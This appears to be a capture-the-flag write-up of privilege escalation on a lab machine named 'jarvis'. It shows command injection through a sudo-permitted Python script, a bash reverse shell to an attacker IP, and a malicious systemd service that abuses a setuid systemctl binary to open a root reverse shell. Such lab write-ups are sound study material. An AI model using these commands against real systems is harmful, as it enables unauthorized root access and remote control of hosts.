Post Exploitation

Privilege Escalation

Analyzing what commands we cun run we note the following

www-data@jarvis:/var/www/Admin-Utilities$ sudo -l 
Matching Defaults entries for www-data on jarvis:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on jarvis:
    (pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py
www-data@jarvis:/var/www/Admin-Utilities$ 

We see that we cun runn simpler.py as pepper. Analyzing that file we learn that it does not filter the '$' character, we can take advantage of that as follows.

www-data@jarvis:/var/www/Admin-Utilities$ ping $(whoami)
ping: www-data: Temporary failure in name resolution

Whatever is in the parenthesis will be executed first.

www-data@jarvis:/$ sudo -u pepper /var/www/Admin-Utilities/simpler.py -p

Running the following gave me a better shell

bash -i >& /dev/tcp/10.10.14.34/4444 0>&1

Running LinEnum.sh, we learn the following:

The systemctl binary has the setuid bit set and it’s owned by root. We can use that to our advantage and escalate to root privileges. If you’re not sure how to do that, you can search the binary name on GTFOBins and check how the suid bit can be used to escalate privileges.

systemctl | GTFOBins

Steps to create a service

On our attacker machine, create the following. root.service with the following content

[Unit]
Description=get root privilege

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.34/9999 0>&1'

[Install]
WantedBy=multi-user.target

Copy it to our target machine and run the following:

/bin/systemctl enable /home/pepper/root.service

Set up your listener and run the following to start the service

/bin/systemctl start root